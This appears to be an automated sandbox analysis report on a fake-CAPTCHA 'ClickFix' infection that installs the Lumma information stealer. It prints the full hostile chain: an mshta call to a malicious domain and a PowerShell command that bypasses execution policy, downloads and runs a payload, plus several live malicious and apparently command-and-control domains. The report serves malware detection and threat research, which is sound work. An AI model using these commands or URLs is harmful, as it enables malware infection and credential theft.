                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\Captcha.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2962Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6735Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: mshta.exe, 00000008.00000002.1768596054.0000000006957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                          Source: mshta.exe, 00000008.00000002.1762272005.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1757390190.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000003016000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1760958120.0000000003059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.0000000003016000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: powershell.exe, 0000000A.00000002.1892100978.000000000721F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(!$1
                          Source: powershell.exe, 0000000A.00000002.1892100978.0000000007236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Bypasses PowerShell execution policy
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.phpJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe" Jump to behavior
                          Source: C:\ProgramData\Captcha.exeProcess created: C:\ProgramData\Captcha.exe noneJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: 12.2.Captcha.exe.14ac000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.14ac000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.1632000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.1632000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.1632000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.1632000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.14ac000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: 12.2.Captcha.exe.14ac000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.14ac000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.1632000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.Captcha.exe.1632000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.1632000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.1632000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.3.Captcha.exe.14ac000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                          Command and Scripting Interpreter                          		3
                          Browser Extensions                          		11
                          Process Injection                          		1
                          Masquerading                          		OS Credential Dumping11
                          Security Software Discovery                          		Remote Services1
                          Email Collection                          		11
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts3
                          PowerShell                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		21
                          Virtualization/Sandbox Evasion                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop Protocol1
                          Archive Collected Data                          		3
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Process Injection                          		Security Account Manager21
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Deobfuscate/Decode Files or Information                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture14
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                          Obfuscated Files or Information                          		LSA Secrets1
                          File and Directory Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials12
                          System Information Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631656 URL: https://rea.grupolalegion.e... Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 38 rea.grupolalegion.ec 2->38 54 Found malware configuration 2->54 56 Detect drive by download via clipboard copy & paste 2->56 58 Yara detected CAPTCHA Scam ClickFix 2->58 60 9 other signatures 2->60 10 cmd.exe 1 2->10         started        12 chrome.exe 9 2->12         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 17 mshta.exe 16 10->17         started        20 conhost.exe 10->20         started        46 192.168.2.8, 138, 443, 49703 unknown unknown 12->46 48 239.255.255.250 unknown Reserved 12->48 22 chrome.exe 12->22         started        process6 dnsIp7 50 Suspicious powershell command line found 17->50 52 Bypasses PowerShell execution policy 17->52 25 powershell.exe 15 17 17->25         started        40 www.google.com 142.250.185.164, 443, 49711 GOOGLEUS United States 22->40 42 216.58.206.68, 443, 49727 GOOGLEUS United States 22->42 44 rea.grupolalegion.ec 190.92.154.206, 443, 49713, 49714 DesarrollosDigitalesdePulsarConsultingAR Argentina 22->44 signatures8 process9 file10 36 C:\ProgramData\Captcha.exe, PE32 25->36 dropped 62 Powershell drops PE file 25->62 29 Captcha.exe 25->29         started        32 conhost.exe 25->32         started        signatures11 process12 signatures13 64 Antivirus detection for dropped file 29->64 66 Multi AV Scanner detection for dropped file 29->66 34 Captcha.exe 29->34         started        process14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          No Antivirus matches

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\Captcha.exe100%AviraTR/Redcap.lcybk
                          C:\ProgramData\Captcha.exe39%ReversingLabsWin32.Spyware.Lummastealer

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          rea.grupolalegion.ec
                          		190.92.154.206
                          		truefalse
                            		high
                            www.google.com
                            		142.250.185.164
                            		truefalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://rea.grupolalegion.ec/p.php/1?jstrue
                                		unknown
                                phygcsforum.lifefalse
                                  		high
                                  techmindzs.livefalse
                                    		high
                                    gadgethgfub.icufalse
                                      		high
                                      https://rea.grupolalegion.ec/p.php/1true
                                        		unknown
                                        moderzysics.topfalse
                                          		high
                                          techspherxe.topfalse
                                            		high
                                            https://rea.grupolalegion.ec/Viber.exetrue
                                              		unknown
                                              codxefusion.topfalse
                                                		high
                                                https://rea.grupolalegion.ec/p.phptrue
                                                  		unknown
                                                  culasova.icutrue
                                                    		unknown
                                                    https://rea.grupolalegion.ec/favicon.icofalse
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://rea.grupolalegion.ec/p.phpJmshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://rea.grupolalegion.ec/p.phpmshtamshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761294842.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://rea.grupolalegion.ecpowershell.exe, 0000000A.00000002.1872617715.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.micropowershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://rea.grupolalegion.ecpowershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://rea.grupolalegion.ec/p.phpAmshta.exe, 00000008.00000003.1761060931.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761873050.0000000002FCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://rea.grupolalegion.ec/p.php?mshta.exe, 00000008.00000003.1757390190.000000000306F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762396893.0000000003070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://rea.grupolalegion.ec/p.phpLMEMHmshta.exe, 00000008.00000003.1758360005.000000000696E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1757504976.000000000696B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1768715509.000000000696F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.microsoft6powershell.exe, 0000000A.00000002.1892100978.0000000007236000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.cloudflare.comchromecache_74.2.drfalse
                                                                                    		high
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://rea.grupolalegion.ec/p.php...ett1mshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://rea.grupolalegion.ec/p.phpEventindowsINetCookiesmshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
